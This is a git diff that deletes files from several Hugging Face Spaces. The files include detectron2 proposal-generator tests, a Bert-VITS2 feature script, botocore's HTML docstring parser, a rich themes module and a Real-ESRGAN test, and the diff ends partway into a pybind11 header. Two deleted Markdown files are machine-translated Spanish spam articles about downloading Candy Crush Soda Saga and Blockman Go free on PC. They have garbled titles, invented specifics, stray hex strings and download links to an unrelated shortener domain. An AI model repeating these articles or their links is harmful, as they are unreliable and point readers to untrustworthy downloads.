test_rrpn(self): - torch.manual_seed(121) - cfg = get_cfg() - cfg.MODEL.PROPOSAL_GENERATOR.NAME = "RRPN" - cfg.MODEL.ANCHOR_GENERATOR.NAME = "RotatedAnchorGenerator" - cfg.MODEL.ANCHOR_GENERATOR.SIZES = [[32, 64]] - cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS = [[0.25, 1]] - cfg.MODEL.ANCHOR_GENERATOR.ANGLES = [[0, 60]] - cfg.MODEL.RPN.BBOX_REG_WEIGHTS = (1, 1, 1, 1, 1) - cfg.MODEL.RPN.HEAD_NAME = "StandardRPNHead" - backbone = build_backbone(cfg) - proposal_generator = build_proposal_generator(cfg, backbone.output_shape()) - num_images = 2 - images_tensor = torch.rand(num_images, 20, 30) - image_sizes = [(10, 10), (20, 30)] - images = ImageList(images_tensor, image_sizes) - image_shape = (15, 15) - num_channels = 1024 - features = {"res4": torch.rand(num_images, num_channels, 1, 2)} - gt_boxes = torch.tensor([[2, 2, 2, 2, 0], [4, 4, 4, 4, 0]], dtype=torch.float32) - gt_instances = Instances(image_shape) - gt_instances.gt_boxes = RotatedBoxes(gt_boxes) - with EventStorage(): # capture events in a new storage to discard them - proposals, proposal_losses = proposal_generator( - images, features, [gt_instances[0], gt_instances[1]] - ) - - expected_losses = { - "loss_rpn_cls": torch.tensor(0.04291602224), - "loss_rpn_loc": torch.tensor(0.145077362), - } - for name in expected_losses.keys(): - err_msg = "proposal_losses[{}] = {}, expected losses = {}".format( - name, proposal_losses[name], expected_losses[name] - ) - self.assertTrue(torch.allclose(proposal_losses[name], expected_losses[name]), err_msg) - - expected_proposal_box = torch.tensor( - [ - [-1.77999556, 0.78155339, 68.04367828, 14.78156471, 60.59333801], - [13.82740974, -1.50282836, 34.67269897, 29.19676590, -3.81942749], - [8.10392570, -0.99071521, 145.39100647, 32.13126373, 3.67242432], - [5.00000000, 4.57370186, 10.00000000, 9.14740372, 0.89196777], - ] - ) - - expected_objectness_logit = torch.tensor([0.10924313, 0.09881870, 0.07649877, 0.05858029]) - - torch.set_printoptions(precision=8, sci_mode=False) - - self.assertEqual(len(proposals), len(image_sizes)) - - proposal = proposals[0] - # It seems that there's some randomness in the result across different machines: - # This test can be run on a local machine for 100 times with exactly the same result, - # However, a different machine might produce slightly different results, - # thus the atol here. - err_msg = "computed proposal boxes = {}, expected {}".format( - proposal.proposal_boxes.tensor, expected_proposal_box - ) - self.assertTrue( - torch.allclose(proposal.proposal_boxes.tensor[:4], expected_proposal_box, atol=1e-5), - err_msg, - ) - - err_msg = "computed objectness logits = {}, expected {}".format( - proposal.objectness_logits, expected_objectness_logit - ) - self.assertTrue( - torch.allclose(proposal.objectness_logits[:4], expected_objectness_logit, atol=1e-5), - err_msg, - ) - - def test_find_rpn_proposals_inf(self): - N, Hi, Wi, A = 3, 3, 3, 3 - proposals = [torch.rand(N, Hi * Wi * A, 4)] - pred_logits = [torch.rand(N, Hi * Wi * A)] - pred_logits[0][1][3:5].fill_(float("inf")) - find_top_rpn_proposals(proposals, pred_logits, [(10, 10)], 0.5, 1000, 1000, 0, False) - - def test_find_rpn_proposals_tracing(self): - N, Hi, Wi, A = 3, 50, 50, 9 - proposal = torch.rand(N, Hi * Wi * A, 4) - pred_logit = torch.rand(N, Hi * Wi * A) - - def func(proposal, logit, image_size): - r = find_top_rpn_proposals( - [proposal], [logit], [image_size], 0.7, 1000, 1000, 0, False - )[0] - size = r.image_size - if not isinstance(size, torch.Tensor): - size = torch.tensor(size) - return (size, r.proposal_boxes.tensor, r.objectness_logits) - - other_inputs = [] - # test that it generalizes to other shapes - for Hi, Wi, shp in [(30, 30, 60), (10, 10, 800)]: - other_inputs.append( - ( - torch.rand(N, Hi * Wi * A, 4), - torch.rand(N, Hi * Wi * A), - torch.tensor([shp, shp]), - ) - ) - torch.jit.trace( - func, (proposal, pred_logit, torch.tensor([100, 100])), check_inputs=other_inputs - ) - - def test_append_gt_to_proposal(self): - proposals = Instances( - (10, 10), - **{ - "proposal_boxes": Boxes(torch.empty((0, 4))), - "objectness_logits": torch.tensor([]), - "custom_attribute": torch.tensor([]), - } - ) - gt_boxes = Boxes(torch.tensor([[0, 0, 1, 1]])) - - self.assertRaises(AssertionError, add_ground_truth_to_proposals, [gt_boxes], [proposals]) - - gt_instances = Instances((10, 10)) - gt_instances.gt_boxes = gt_boxes - - self.assertRaises( - AssertionError, add_ground_truth_to_proposals, [gt_instances], [proposals] - ) - - gt_instances.custom_attribute = torch.tensor([1]) - gt_instances.custom_attribute2 = torch.tensor([1]) - new_proposals = add_ground_truth_to_proposals([gt_instances], [proposals])[0] - - self.assertEqual(new_proposals.custom_attribute[0], 1) - # new proposals should only include the attributes in proposals - self.assertRaises(AttributeError, lambda: new_proposals.custom_attribute2) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/AzumaSeren100/XuanShen-Bert-VITS2/bert_gen.py b/spaces/AzumaSeren100/XuanShen-Bert-VITS2/bert_gen.py deleted file mode 100644 index 52220d81da097772277eb3bd49f0d3db65884523..0000000000000000000000000000000000000000 --- a/spaces/AzumaSeren100/XuanShen-Bert-VITS2/bert_gen.py +++ /dev/null @@ -1,54 +0,0 @@ -import torch -from torch.utils.data import DataLoader -from multiprocessing import Pool -import commons -import utils -from data_utils import TextAudioSpeakerLoader, TextAudioSpeakerCollate -from tqdm import tqdm -import warnings - -from text import cleaned_text_to_sequence, get_bert - -config_path = 'configs/config.json' -hps = utils.get_hparams_from_file(config_path) - -def process_line(line): - _id, spk, language_str, text, phones, tone, word2ph = line.strip().split("|") - phone = phones.split(" ") - tone = [int(i) for i in tone.split(" ")] - word2ph = [int(i) for i in word2ph.split(" ")] - w2pho = [i for i in word2ph] - word2ph = [i for i in word2ph] - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - - if hps.data.add_blank: - phone = commons.intersperse(phone, 0) - tone = commons.intersperse(tone, 0) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - wav_path = f'{_id}' - - bert_path = wav_path.replace(".wav", ".bert.pt") - - try: - bert = torch.load(bert_path) - assert bert.shape[-1] == len(phone) - except: - bert = get_bert(text, word2ph, language_str) - assert bert.shape[-1] == len(phone) - torch.save(bert, bert_path) - - -if __name__ == '__main__': - lines = [] - with open(hps.data.training_files, encoding='utf-8' ) as f: - lines.extend(f.readlines()) - - with open(hps.data.validation_files, encoding='utf-8' ) as f: - lines.extend(f.readlines()) - - with Pool(processes=6) as pool: #P40 24GB suitable config,if coom,please decrease the processess number. - for _ in tqdm(pool.imap_unordered(process_line, lines)): - pass diff --git a/spaces/Bajr/softly/README.md b/spaces/Bajr/softly/README.md deleted file mode 100644 index 05bc77ff2110f21e508f8010a3d40cee35a05ace..0000000000000000000000000000000000000000 --- a/spaces/Bajr/softly/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Yummy Research -emoji: 🍦 -colorFrom: red -colorTo: blue -sdk: docker -pinned: false -duplicated_from: Bajr/soft ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Benson/text-generation/Examples/Caramelo Crush Soda Saga Juego Gratis Para Pc.md b/spaces/Benson/text-generation/Examples/Caramelo Crush Soda Saga Juego Gratis Para Pc.md deleted file mode 100644 index 2a9260035906288adf75df79e0c0bf1c02241d68..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Caramelo Crush Soda Saga Juego Gratis Para Pc.md +++ /dev/null @@ -1,103 +0,0 @@ - -

Candy Crush Soda Saga: Cómo descargar y jugar este divertido juego de puzzle en su PC

-

Si te gusta combinar dulces y resolver puzzles, es posible que haya oído hablar de Candy Crush Soda Saga, uno de los juegos más populares del mundo. Este juego es una secuela de la legendaria saga Candy Crush, y ofrece más diversión y desafíos con nuevos dulces, modos y características. En este artículo, te mostraremos cómo descargar y jugar este juego en tu PC de forma gratuita, utilizando la Epic Games Store. También le diremos por qué jugar juegos de puzzle en su PC es bueno para su cerebro y su estado de ánimo, y le daremos algunos consejos y trucos para aprovechar al máximo su experiencia de juego.

-

¿Qué es Candy Crush Soda Saga?

-

Candy Crush Soda Saga es un juego de puzzle match-3 desarrollado por King, una empresa líder en juegos casuales. El juego fue lanzado en 2014 como un spin-off de Candy Crush Saga, que tiene más de mil millones de descargas en todo el mundo. El juego sigue las aventuras de Kimmy, que está buscando a su hermana Tiffi en un mundo lleno de dulces. En el camino, se encuentra con nuevos personajes y se enfrenta a nuevos desafíos.

-

caramelo crush soda saga juego gratis para pc


Download File ★★★ https://bltlly.com/2v6J0M



-

El juego tiene más de 10.000 niveles, cada uno con un objetivo y diseño diferentes. Tienes que combinar tres o más caramelos del mismo color para eliminarlos del tablero y crear dulces especiales que tienen efectos adicionales. También tienes que lidiar con varios obstáculos, como hielo, panal, mermelada, chocolate y botellas de refresco. El juego tiene diferentes modos, como Soda, Frosting, Honeycomb, Jam, Bubblegum y más. Cada modo tiene sus propias reglas y estrategias.

-

El juego también tiene muchas características que lo hacen más divertido y atractivo. Puedes jugar con tus amigos en línea y competir por puntuaciones altas. También puedes unirte a equipos y cooperar con otros jugadores en eventos y desafíos. También puedes ganar recompensas y refuerzos que te ayudan en niveles difíciles. El juego también tiene actualizaciones mensuales que traen nuevo contenido y sorpresas.

-

¿Por qué jugar Candy Crush Soda Saga en su PC?

- -
    -
  • Puedes disfrutar de mejores gráficos y calidad de sonido en una pantalla más grande.
  • -
  • Puedes usar el ratón y el teclado para controlar el juego más fácilmente.
  • -
  • Puede ahorrar su vida útil de la batería y el uso de datos en su teléfono o tableta.
  • -
  • Puedes evitar distracciones de notificaciones y llamadas mientras juegas.
  • -
-

Una de las mejores maneras de jugar Candy Crush Soda Saga en tu PC es usar la Epic Games Store, una plataforma de distribución digital que te permite descargar juegos a tu PC a través del Lanzador de Epic Games. La Epic Games Store tiene muchas ventajas, como:

-
    -
  • Puedes acceder a cientos de juegos de varios géneros y categorías.
  • -
  • Puedes obtener juegos gratis cada semana.
  • -
  • Puedes disfrutar de ofertas y descuentos exclusivos.
  • -
  • Puedes apoyar a los desarrolladores dándoles una mayor proporción de los ingresos.
  • -
  • Puedes conectarte con tus amigos y otros jugadores a través de chat y funciones sociales.
  • -
-

¿Cómo descargar y jugar Candy Crush Soda Saga en su PC?

-

Descargar y jugar Candy Crush Soda Saga en tu PC es muy fácil. Solo sigue estos pasos:

-
    -
  1. Instalar el lanzador de juegos épicos. Puede descargarlo desde [5](https:// epicgames.com/en-US/download) y ejecutar el instalador. Necesitarás crear una cuenta o iniciar sesión con la existente.
  2. -
  3. Buscar Candy Crush Soda Saga en la Epic Games Store. Puedes encontrarlo en la sección de Juegos Gratis o usar la barra de búsqueda.
  4. -
  5. Haga clic en el botón Obtener y confirme su pedido. El juego se agregará a su biblioteca.
  6. -
  7. Vaya a su biblioteca y haga clic en el botón Instalar junto al juego. Elija una ubicación para los archivos del juego y espere a que se complete la descarga y la instalación.
  8. -
  9. Inicie el juego desde su biblioteca o desde el acceso directo del escritorio. También puede ajustar la configuración y las preferencias del juego desde el lanzador.
  10. -
- - - -Requisitos del sistema -Mínimo -Recomendado - - -Sistema operativo -Windows 7 o superior -Windows 10 - - -Procesador -Intel Core i3 o equivalente -Intel Core i5 o equivalente - - -Memoria -4 GB de RAM -8 GB de RAM - - -Gráficos -Intel HD Graphics 4000 o superior -NVIDIA GeForce GTX 660 o superior - - -Almacenamiento -500 MB de espacio disponible -1 GB de espacio disponible - - -Conexión a Internet -Conexión a Internet de banda ancha -Conexión a Internet de banda ancha - -

Consejos y trucos para disfrutar de Candy Crush Soda Saga más

-

Candy Crush Soda Saga es un juego divertido y adictivo, pero también puede ser desafiante y frustrante a veces. Aquí hay algunos consejos y trucos para ayudarle a disfrutar del juego más:

-

-
    -
  • Planifique sus movimientos. Trate de buscar partidos que pueden crear dulces especiales, como rayas, envueltos, pescado o caramelos para colorear. Estos pueden ayudarte a eliminar más caramelos y obstáculos en un solo movimiento.
  • -
  • Use boosters sabiamente. Los boosters son elementos que pueden darle una ventaja en el juego, como movimientos adicionales, martillos de piruleta, interruptores libres y más. Puedes ganarlos completando niveles, eventos o desafíos, o comprándolos con dinero real. Sin embargo, no confíes demasiado en ellos, ya que son limitados y pueden agotarse rápidamente.
  • -
  • Juega con amigos. Jugar con amigos puede hacer el juego más divertido y social. Puedes invitar a tus amigos a unirse a tu equipo, enviar y recibir vidas, chatear con ellos y competir por puntuaciones altas. También puedes pedirles ayuda cuando estás atascado en un nivel.
  • - -
  • Diviértete. No dejes que el juego te estrese o te frustre. Recuerda que es solo un juego, y el propósito principal es divertirse. Disfrute de los gráficos coloridos, la música pegadiza, y los personajes lindos. No tengas miedo de experimentar con diferentes estrategias y ver lo que funciona para ti.
  • -

    Conclusión

    -

    Candy Crush Soda Saga es un gran juego para jugar en tu PC, especialmente si te gustan los juegos de puzzle y dulces. Puedes descargarlo gratis desde la Epic Games Store y disfrutar de sus características y beneficios. También puedes seguir nuestros consejos y trucos para aprovechar al máximo tu experiencia de juego. ¿Qué estás esperando? ¡Descarga Candy Crush Soda Saga hoy y únete a Kimmy en su dulce aventura!

    -

    Preguntas frecuentes

    -

    Aquí están algunas de las preguntas más frecuentes sobre Candy Crush Soda Saga:

    -

    P: ¿Cuántos niveles hay en Candy Crush Soda Saga?

    -

    A: Hay más de 10,000 niveles en Candy Crush Soda Saga a partir de junio de 2023, y se agregan más cada mes.

    -

    Q: ¿Cómo puedo sincronizar mi progreso a través de dispositivos?

    -

    A: Puedes sincronizar tu progreso entre dispositivos conectando tu juego a Facebook o King.com. Esto también le permitirá acceder a sus boosters y vidas salvadas.

    -

    Q: ¿Cómo consigo más vidas?

    -

    A: Tienes cinco vidas en Candy Crush Soda Saga, y pierdes una cada vez que fallas un nivel. Puedes obtener más vidas esperando a que se llenen (una vida cada 30 minutos), pidiendo a tus amigos que te envíen algunas, comprándolas con barras de oro o jugando las misiones diarias.

    -

    P: ¿Qué son las barras de oro y cómo las consigo?

    -

    A: Las barras de oro son la moneda premium en Candy Crush Soda Saga. Puedes usarlas para comprar potenciadores, vidas, movimientos y otros artículos. Puedes obtener barras de oro completando niveles, eventos o desafíos, o comprándolas con dinero real.

    -

    P: ¿Cuáles son los diferentes tipos de dulces especiales y cómo los hago?

    - -
      -
    • Caramelo a rayas: Combina cuatro caramelos del mismo color en una fila o columna. Esto creará un caramelo a rayas que limpiará toda una fila o columna cuando coincida.
    • -
    • Caramelo envuelto: Combina cinco caramelos del mismo color en forma de L o T. Esto creará un caramelo envuelto que explotará dos veces cuando coincida, despejando un área de 3x3 cada vez.
    • -
    • Caramelo de pescado: Combina cuatro caramelos del mismo color en un cuadrado. Esto creará un caramelo de pescado que nadará a un caramelo o obstáculo al azar y lo despejará cuando coincida.
    • -
    • Caramelo para colorear: combina seis o más caramelos del mismo color. Esto creará un caramelo para colorear que cambiará el color de todos los dulces que coincidan con su color cuando coincida.
    • -
    • Bomba de color: Combina cinco caramelos del mismo color en una fila o columna. Esto creará una bomba de color que borrará todos los caramelos del mismo color con el que se intercambia.
    • -
    • Pescado sueco: Este es un caramelo especial que solo se puede obtener mediante el uso de refuerzos o jugando ciertos niveles. Actúa como un caramelo de pescado, pero puede apuntar a dulces específicos u obstáculos que se necesitan para completar el nivel.
    • -

    64aa2da5cf
    -
    -
    \ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Cmo Descargar Blockman Ir En El PC Gratis.md b/spaces/Benson/text-generation/Examples/Cmo Descargar Blockman Ir En El PC Gratis.md deleted file mode 100644 index e0d6ebe5e01647e8b24830f021cbd475e48101f5..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Cmo Descargar Blockman Ir En El PC Gratis.md +++ /dev/null @@ -1,57 +0,0 @@ - -

    Cómo descargar Blockman Go en PC gratis

    -

    Blockman Go es un popular juego que combina elementos de sandbox, aventura, acción y juegos sociales. Puedes jugar varios minijuegos estilo bloque, chatear y hacer amigos con otros jugadores, y personalizar tu avatar y hogar con diferentes decoraciones. Pero ¿sabías que también puedes jugar Blockman Go en tu PC de forma gratuita? En este artículo, te mostraremos cómo descargar e instalar Blockman Go en tu PC con BlueStacks, un potente emulador de Android que te permite ejecutar aplicaciones y juegos de Android en tu ordenador o portátil.

    -

    cómo descargar blockman ir en el PC gratis


    Download ►►► https://bltlly.com/2v6INR



    -

    ¿Qué es Blockman Go?

    -

    Blockman Go es una aplicación gratuita desarrollada por Blockman GO Studio. Es un juego sandbox que te permite jugar, crear y compartir tus experiencias divertidas con tus amigos. Puedes elegir entre un amplio catálogo de minijuegos, que se actualizan continuamente para mantener las cosas frescas y divertidas. Algunos de los minijuegos populares son Bed Wars, Egg War, Sky Block, Free City RP, Anime Fighting Simulator y más. Puedes unirte a cualquier juego con un clic y ganar recompensas por jugar.

    -

    Blockman Go es también una plataforma social donde puedes chatear y hacer amigos con otros jugadores. Puede unirse o crear fiestas, enviar mensajes, chat de voz e interactuar con otros de varias maneras. También puedes unirte a la creciente comunidad de desarrolladores y compartir tus creaciones con el mundo.

    -

    Blockman Go es también una herramienta creativa que te permite personalizar tu avatar y hogar con diferentes accesorios, disfraces y decoraciones. Puedes expresar tu estilo y personalidad únicos con cientos de opciones disponibles. También puedes usar el Blockman Editor para crear tus propias experiencias de sandbox y minijuegos.

    -

    ¿Por qué jugar Blockman ir en el PC?

    -

    Mientras que Blockman Go está diseñado para dispositivos móviles, también se puede jugar en su PC de forma gratuita con BlueStacks. Hay muchas ventajas de jugar Blockman Go en PC, tales como:

    -
      - -
    • Puedes usar el teclado y el ratón para controles más precisos, lo que te dará una ventaja en minijuegos competitivos.
    • -
    • Puede acceder a miles de aplicaciones y herramientas de productividad con BlueStacks, que le ayudarán a trabajar de manera más eficiente y conveniente en su PC.
    • -
    -

    Cómo descargar e instalar Blockman Ir en el PC con BlueStacks

    -

    Para jugar Blockman Ir en el PC de forma gratuita, es necesario descargar e instalar BlueStacks en su PC primero. BlueStacks es un emulador de Android que te permite ejecutar aplicaciones y juegos de Android en tu ordenador o portátil. Estos son los pasos para descargar e instalar Blockman Ir en el PC con BlueStacks:

    -

    -
      -
    1. Descargue e instale BlueStacks en su PC desde este enlace.
    2. -
    3. Iniciar sesión completo en Google para acceder a Play Store, o hacerlo más tarde.
    4. -
    5. Buscar Blockman Ir en el centro de aplicaciones o la barra de búsqueda en la esquina superior derecha.
    6. -
    7. Haga clic para instalar Blockman Go desde los resultados de búsqueda.
    8. -
    9. Haga clic en el icono de Blockman Go en la pantalla de inicio para comenzar a jugar.
    10. -
    -

    Conclusión

    -

    Blockman Go es un juego divertido y versátil que ofrece mucho entretenimiento y creatividad. Puedes jugar varios minijuegos, chatear y hacer amigos, y personalizar tu avatar y hogar. También puedes jugar a Blockman Go en tu PC gratis con BlueStacks, un emulador de Android que te permite ejecutar aplicaciones y juegos de Android en tu ordenador o portátil. Al jugar Blockman Go en PC, puedes disfrutar de una pantalla más grande, mejores gráficos, controles de teclado y ratón, y acceso a miles de aplicaciones y herramientas de productividad. Para descargar e instalar Blockman Ir en el PC con BlueStacks, solo tiene que seguir unos sencillos pasos. Esperamos que este artículo te haya ayudado a aprender a descargar Blockman Go en PC gratis.

    -

    Preguntas frecuentes

    -

    Aquí hay algunas preguntas frecuentes sobre Blockman Go y BlueStacks:

    - - -Pregunta -Respuesta - - -Es Blockman Go libre para jugar? - - - -¿Es seguro jugar a Blockman? -Sí, Blockman Go es seguro para jugar. Tiene una calificación de 4.3 en la Google Play Store y una calificación de 4.6 en la App Store. También tiene controles parentales y sistemas anti-trucos para garantizar un entorno de juego justo y seguro. - - -¿BlueStacks es de uso gratuito? -Sí, BlueStacks es de uso gratuito. Puede descargarlo desde este enlace. También puede actualizar a BlueStacks Premium para obtener más características y beneficios. - - -¿Es seguro usar BlueStacks? -Sí, BlueStacks es seguro de usar. Es el emulador de Android más confiable y popular en el mundo, con más de 500 millones de usuarios. También tiene características avanzadas de seguridad y protección antivirus para garantizar su seguridad y privacidad. - - -¿Cómo puedo contactar con el soporte de Blockman Go o BlueStacks? -Si tiene algún problema o pregunta sobre Blockman Go o BlueStacks, puede ponerse en contacto con sus equipos de soporte a través de sus sitios web oficiales o canales de redes sociales. También puede consultar sus preguntas frecuentes y foros para obtener más información y soluciones. - -

    64aa2da5cf
    -
    -
    \ No newline at end of file diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/botocore/docs/bcdoc/docstringparser.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/botocore/docs/bcdoc/docstringparser.py deleted file mode 100644 index 16e74e7d20f0f100b0a0e615069f9b0b4e12449c..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/botocore/docs/bcdoc/docstringparser.py +++ /dev/null @@ -1,315 +0,0 @@ -# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"). You -# may not use this file except in compliance with the License. A copy of -# the License is located at -# -# http://aws.amazon.com/apache2.0/ -# -# or in the "license" file accompanying this file. This file is -# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF -# ANY KIND, either express or implied. See the License for the specific -# language governing permissions and limitations under the License. -from html.parser import HTMLParser -from itertools import zip_longest - -PRIORITY_PARENT_TAGS = ('code', 'a') -OMIT_NESTED_TAGS = ('span', 'i', 'code', 'a') -OMIT_SELF_TAGS = ('i', 'b') -HTML_BLOCK_DISPLAY_TAGS = ('p', 'note', 'ul', 'li') - - -class DocStringParser(HTMLParser): - """ - A simple HTML parser. Focused on converting the subset of HTML - that appears in the documentation strings of the JSON models into - simple ReST format. - """ - - def __init__(self, doc): - self.tree = None - self.doc = doc - super().__init__() - - def reset(self): - HTMLParser.reset(self) - self.tree = HTMLTree(self.doc) - - def feed(self, data): - super().feed(data) - self.tree.write() - self.tree = HTMLTree(self.doc) - - def close(self): - super().close() - # Write if there is anything remaining. - self.tree.write() - self.tree = HTMLTree(self.doc) - - def handle_starttag(self, tag, attrs): - self.tree.add_tag(tag, attrs=attrs) - - def handle_endtag(self, tag): - self.tree.add_tag(tag, is_start=False) - - def handle_data(self, data): - self.tree.add_data(data) - - -class HTMLTree: - """ - A tree which handles HTML nodes. Designed to work with a python HTML parser, - meaning that the current_node will be the most recently opened tag. When - a tag is closed, the current_node moves up to the parent node. - """ - - def __init__(self, doc): - self.doc = doc - self.head = StemNode() - self.current_node = self.head - self.unhandled_tags = [] - - def add_tag(self, tag, attrs=None, is_start=True): - if not self._doc_has_handler(tag, is_start): - self.unhandled_tags.append(tag) - return - - if is_start: - node = TagNode(tag, attrs) - self.current_node.add_child(node) - self.current_node = node - else: - self.current_node = self.current_node.parent - - def _doc_has_handler(self, tag, is_start): - if is_start: - handler_name = 'start_%s' % tag - else: - handler_name = 'end_%s' % tag - - return hasattr(self.doc.style, handler_name) - - def add_data(self, data): - self.current_node.add_child(DataNode(data)) - - def write(self): - self.head.write(self.doc) - - -class Node: - def __init__(self, parent=None): - self.parent = parent - - def write(self, doc): - raise NotImplementedError - - -class StemNode(Node): - def __init__(self, parent=None): - super().__init__(parent) - self.children = [] - - def add_child(self, child): - child.parent = self - self.children.append(child) - - def write(self, doc): - self.collapse_whitespace() - self._write_children(doc) - - def _write_children(self, doc): - for child, next_child in zip_longest(self.children, self.children[1:]): - if isinstance(child, TagNode) and next_child is not None: - child.write(doc, next_child) - else: - child.write(doc) - - def is_whitespace(self): - return all(child.is_whitespace() for child in self.children) - - def startswith_whitespace(self): - return self.children and self.children[0].startswith_whitespace() - - def endswith_whitespace(self): - return self.children and self.children[-1].endswith_whitespace() - - def lstrip(self): - while self.children and self.children[0].is_whitespace(): - self.children = self.children[1:] - if self.children: - self.children[0].lstrip() - - def rstrip(self): - while self.children and self.children[-1].is_whitespace(): - self.children = self.children[:-1] - if self.children: - self.children[-1].rstrip() - - def collapse_whitespace(self): - """Remove collapsible white-space from HTML. - - HTML in docstrings often contains extraneous white-space around tags, - for readability. Browsers would collapse this white-space before - rendering. If not removed before conversion to RST where white-space is - part of the syntax, for example for indentation, it can result in - incorrect output. - """ - self.lstrip() - self.rstrip() - for child in self.children: - child.collapse_whitespace() - - -class TagNode(StemNode): - """ - A generic Tag node. It will verify that handlers exist before writing. - """ - - def __init__(self, tag, attrs=None, parent=None): - super().__init__(parent) - self.attrs = attrs - self.tag = tag - - def _has_nested_tags(self): - # Returns True if any children are TagNodes and False otherwise. - return any(isinstance(child, TagNode) for child in self.children) - - def write(self, doc, next_child=None): - prioritize_nested_tags = ( - self.tag in OMIT_SELF_TAGS and self._has_nested_tags() - ) - prioritize_parent_tag = ( - isinstance(self.parent, TagNode) - and self.parent.tag in PRIORITY_PARENT_TAGS - and self.tag in OMIT_NESTED_TAGS - ) - if prioritize_nested_tags or prioritize_parent_tag: - self._write_children(doc) - return - - self._write_start(doc) - self._write_children(doc) - self._write_end(doc, next_child) - - def collapse_whitespace(self): - """Remove collapsible white-space. - - All tags collapse internal whitespace. Block-display HTML tags also - strip all leading and trailing whitespace. - - Approximately follows the specification used in browsers: - https://www.w3.org/TR/css-text-3/#white-space-rules - https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model/Whitespace - """ - if self.tag in HTML_BLOCK_DISPLAY_TAGS: - self.lstrip() - self.rstrip() - # Collapse whitespace in situations like `` foo`` into - # `` foo``. - for prev, cur in zip(self.children[:-1], self.children[1:]): - if ( - isinstance(prev, DataNode) - and prev.endswith_whitespace() - and cur.startswith_whitespace() - ): - cur.lstrip() - # Same logic, but for situations like ``bar ``: - for cur, nxt in zip(self.children[:-1], self.children[1:]): - if ( - isinstance(nxt, DataNode) - and cur.endswith_whitespace() - and nxt.startswith_whitespace() - ): - cur.rstrip() - # Recurse into children - for child in self.children: - child.collapse_whitespace() - - def _write_start(self, doc): - handler_name = 'start_%s' % self.tag - if hasattr(doc.style, handler_name): - getattr(doc.style, handler_name)(self.attrs) - - def _write_end(self, doc, next_child): - handler_name = 'end_%s' % self.tag - if hasattr(doc.style, handler_name): - if handler_name == 'end_a': - # We use lookahead to determine if a space is needed after a link node - getattr(doc.style, handler_name)(next_child) - else: - getattr(doc.style, handler_name)() - - -class DataNode(Node): - """ - A Node that contains only string data. - """ - - def __init__(self, data, parent=None): - super().__init__(parent) - if not isinstance(data, str): - raise ValueError("Expecting string type, %s given." % type(data)) - self._leading_whitespace = '' - self._trailing_whitespace = '' - self._stripped_data = '' - if data == '': - return - if data.isspace(): - self._trailing_whitespace = data - return - first_non_space = next( - idx for idx, ch in enumerate(data) if not ch.isspace() - ) - last_non_space = len(data) - next( - idx for idx, ch in enumerate(reversed(data)) if not ch.isspace() - ) - self._leading_whitespace = data[:first_non_space] - self._trailing_whitespace = data[last_non_space:] - self._stripped_data = data[first_non_space:last_non_space] - - @property - def data(self): - return ( - f'{self._leading_whitespace}{self._stripped_data}' - f'{self._trailing_whitespace}' - ) - - def is_whitespace(self): - return self._stripped_data == '' and ( - self._leading_whitespace != '' or self._trailing_whitespace != '' - ) - - def startswith_whitespace(self): - return self._leading_whitespace != '' or ( - self._stripped_data == '' and self._trailing_whitespace != '' - ) - - def endswith_whitespace(self): - return self._trailing_whitespace != '' or ( - self._stripped_data == '' and self._leading_whitespace != '' - ) - - def lstrip(self): - if self._leading_whitespace != '': - self._leading_whitespace = '' - elif self._stripped_data == '': - self.rstrip() - - def rstrip(self): - if self._trailing_whitespace != '': - self._trailing_whitespace = '' - elif self._stripped_data == '': - self.lstrip() - - def collapse_whitespace(self): - """Noop, ``DataNode.write`` always collapses whitespace""" - return - - def write(self, doc): - words = doc.translate_words(self._stripped_data.split()) - str_data = ( - f'{self._leading_whitespace}{" ".join(words)}' - f'{self._trailing_whitespace}' - ) - if str_data != '': - doc.handle_data(str_data) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/themes.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/themes.py deleted file mode 100644 index bf6db104a2c4fd4f3dc699e85f2b262c3d31e9a0..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/themes.py +++ /dev/null @@ -1,5 +0,0 @@ -from .default_styles import DEFAULT_STYLES -from .theme import Theme - - -DEFAULT = Theme(DEFAULT_STYLES) diff --git a/spaces/Billyosoro/ESRGAN/tests/test_discriminator_arch.py b/spaces/Billyosoro/ESRGAN/tests/test_discriminator_arch.py deleted file mode 100644 index c56a40c7743630aa63b3e99bca8dc1a85949c4c5..0000000000000000000000000000000000000000 --- a/spaces/Billyosoro/ESRGAN/tests/test_discriminator_arch.py +++ /dev/null @@ -1,19 +0,0 @@ -import torch - -from realesrgan.archs.discriminator_arch import UNetDiscriminatorSN - - -def test_unetdiscriminatorsn(): - """Test arch: UNetDiscriminatorSN.""" - - # model init and forward (cpu) - net = UNetDiscriminatorSN(num_in_ch=3, num_feat=4, skip_connection=True) - img = torch.rand((1, 3, 32, 32), dtype=torch.float32) - output = net(img) - assert output.shape == (1, 1, 32, 32) - - # model init and forward (gpu) - if torch.cuda.is_available(): - net.cuda() - output = net(img.cuda()) - assert output.shape == (1, 1, 32, 32) diff --git a/spaces/CVPR/LIVE/pybind11/include/pybind11/pybind11.h b/spaces/CVPR/LIVE/pybind11/include/pybind11/pybind11.h deleted file mode 100644 index 3a7d7b88495afddabff7f9604c94e828eb780152..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/pybind11/include/pybind11/pybind11.h +++ /dev/null @@ -1,2235 +0,0 @@ -/* - pybind11/pybind11.h: Main header file of the C++11 python - binding generator library - - Copyright (c) 2016 